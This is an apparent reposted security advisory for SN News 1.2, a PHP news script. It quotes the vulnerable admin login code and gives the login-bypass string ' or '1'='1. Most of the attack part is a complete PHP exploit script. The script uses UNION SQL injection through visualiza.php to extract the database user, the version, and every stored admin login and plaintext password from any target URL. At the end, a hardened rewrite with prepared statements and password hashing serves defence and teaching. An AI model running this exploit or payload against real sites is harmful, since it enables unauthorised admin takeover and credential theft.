

SN News <= 1.2 Admin Authentication Bypass and SQL Injection - Website Security

SN News <= 1.2 (/admin/logar.php) Admin Bypass Remote SQL Injection Vulnerability

Affected version: 1.2
Download: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
The author accepts no responsibility for any damage caused.

##############################################################################

## The flaw is located in /admin/logar.php [lines 4-15]:

4.  $login = $_POST["login"];
5.  $senha = $_POST["senha"];
6.  $sql   = "select * from news_adm where login='$login' AND senha='$senha'";
7.  $query = mysql_query($sql);
8.  $nr    = mysql_num_rows($query);
9.  if($nr>0){
10.     $_SESSION["admin"] = "on";
11.     echo "<script>
12.     location.href=''
13.     </script>
14.     ";
15. }

## Notes:
## As you can see there is no validation or any filter on the variables $login and $senha.
## See line 6: both variables are concatenated straight into the SQL query, so either one can be used to inject SQL.

## SQL Injection PoC:
## http://www.2cto.com/sn_news/admin/login.htm
## Login: ' or '1'='1
## Senha: ' or '1'='1
## This injection will bypass the admin login screen.

# Title: SN News <= 1.2 SQL Injection

<?php
/*
   Example:
   $ php mnews.php http://www.2cto.com/scripts/mnews/
*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

// Encode a string as a MySQL 0x... hex literal (each byte as two hex digits)
function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= sprintf('%02x', ord($string[$i]));
    }
    return '0x'.$hex;
}

echo "\nSN News <= 1.2 SQL Injection exploit\n";
echo "Discovered and written by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";

if($argc!=2) {
    echo "Usage: \n";
    echo "php $argv[0] <target url>\n";
    echo "Example:\n";
    echo "php $argv[0] http://www.website.com/snnews\n";
    exit;
}

$target = $argv[1];
if(substr($target, (strlen($target)-1))!="/") {
    $target .= "/";
}
$inject = $target . "visualiza.php?id=-0'%20";

// Random marker used to locate the injected columns in the returned HTML
$token = uniqid();
$token_hex = hex($token);

echo "[*] Trying to get informations...\n";
$infos = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", user(), ".$token_hex.", version(), ".$token_hex."),3,4,5-- "));
$infos_r = array();
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
if($user) {
    echo "[*] MySQL version: $version\n";
    echo "[*] MySQL user: $user\n";
} else {
    echo "[-] Error while getting informations.\n";
}

echo "[*] Getting users...\n";
$i = 0;
while(true) {
    $dados_r = array();
    $dados = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", login, ".$token_hex.", senha, ".$token_hex."),3,4,5 from news_adm limit $i,1-- "));
    preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);
    $login = $dados_r[1][0];
    $senha = $dados_r[2][0];
    if(($login) AND ($senha)) {
        echo "-+-\n";
        echo "User: $login\n";
        echo "Pass: $senha\n";
    } else {
        break;
    }
    $i++;
}

echo "-+-+-\n";
if($i!=0) {
    echo "[!] Admin login: {$target}admin/\n";
} else {
    echo "[-] Exploit failed. Make sure that the server is using a valid version of SN News without Apache mod_security.\nWe're sorry.";
}
echo "\n";
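Hardened replacements for the two query sites the advisory describes (the login in logar.php and the id lookup in visualiza.php), as an added example that is not part of SN News or the advisory. It assumes a mysqli connection in $db (with mysqlnd), that news_adm.senha stores a password_hash() result, and placeholder column names titulo/texto on the news table.

```php
<?php
// Added example, not SN News code. Assumes: a mysqli connection in $db (with
// mysqlnd for get_result), news_adm(login, senha) where senha stores a
// password_hash() result, and an integer id column on the news table.
// Column names titulo/texto are placeholders.
session_start();

function adminLogin(mysqli $db, string $login, string $senha): bool
{
    // Parameterised query: the input is bound as data, never spliced into the
    // SQL text, so "' or '1'='1" is simply compared literally against login.
    $stmt = $db->prepare("SELECT senha FROM news_adm WHERE login = ? LIMIT 1");
    $stmt->bind_param("s", $login);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();
    $stmt->close();

    // Verify against a stored hash; with no plaintext senha in the table, a
    // UNION read of news_adm (the second bug) yields no reusable passwords.
    if (!$found || !password_verify($senha, $hash)) {
        return false;
    }
    session_regenerate_id(true);   // new session id on privilege change
    $_SESSION["admin"] = "on";
    return true;
}

function loadNews(mysqli $db, $rawId): ?array
{
    // visualiza.php?id=... : accept only a positive integer, so a quoted
    // payload like the advisory's id=-0' is rejected before any SQL is built.
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false || $id < 1) {
        return null;
    }
    $stmt = $db->prepare("SELECT id, titulo, texto FROM news WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// In logar.php:
// if (adminLogin($db, $_POST["login"] ?? '', $_POST["senha"] ?? '')) {
//     header("Location: index.php"); exit;
// }
```

Migrating existing rows requires rehashing each password with password_hash() once, since the original schema stores senha in plaintext.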

